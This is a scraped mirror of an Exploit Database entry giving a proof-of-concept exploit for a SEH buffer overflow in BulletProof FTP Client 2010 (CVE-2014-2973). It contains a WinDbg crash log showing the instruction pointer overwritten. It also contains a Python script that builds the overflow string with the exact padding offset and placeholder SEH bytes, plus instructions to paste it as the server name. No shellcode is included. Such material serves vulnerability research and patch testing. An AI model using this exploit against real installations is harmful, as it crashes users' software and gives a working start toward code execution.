BulletProof FTP Client 2010 – Buffer Overflow (SEH) (PoC)

• Exploit Database
• 125 阅读

• 作者： Gabor Seljan
  日期： 2014-07-24
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/34162/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58

  #-----------------------------------------------------------------------------# # Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH)# # Date: Jul 24 2014 # # Exploit Author: Gabor Seljan# # Software Link: http://www.bpftp.com/# # Version: 2010.75.0.76 # # Tested on: Windows XP SP3 # # CVE: CVE-2014-2973# #-----------------------------------------------------------------------------#   ''' (a00.9e4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=41414141 ebx=41414141 ecx=007ef590 edx=00000000 esi=017a4f6a edi=017a516a eip=005c005b esp=0012f594 ebp=0012f610 iopl=0 nv up ei pl zr na pe nc cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010246 *** ERROR: Symbol file could not be found.Defaulted to export symbols for bpftpclient.exe - bpftpclient+0x1c005b: 005c005b f6431c10testbyte ptr [ebx+1Ch],10h ds:0023:4141415d=?? 0:000> !exchain 0012f59c: bpftpclient+1c044e (005c044e) 0012f5a8: bpftpclient+1c046b (005c046b) 0012f618: 43434343 Invalid exception stack at 42424242 0:000> g (a00.9e4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=00000000 ecx=43434343 edx=7c9032bc esi=00000000 edi=00000000 eip=43434343 esp=0012f1c4 ebp=0012f1e4 iopl=0 nv up ei pl zr na pe nc cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010246 43434343 ????? '''   #!/usr/bin/python   junk1 = b'\x41' * 89 nSEH= b'\x42' * 4 SEH = b'\x43' * 4 junk2 = b'\x44' * 1000   sploit = junk1 + nSEH + SEH + junk2   try: print('[+] Creating exploit file...') f = open('sploit.txt', 'wb') f.write(sploit) f.close() print('[+] Exploit file created successfully!') except: print('[!] Error while creating exploit file!')   print('[+] Use the following as Server Name/IP with any user\'s credentials!') print(sploit.decode())   ##EDB Note: You can also enter the contents of the file in the "Enter URL" to cause this crash.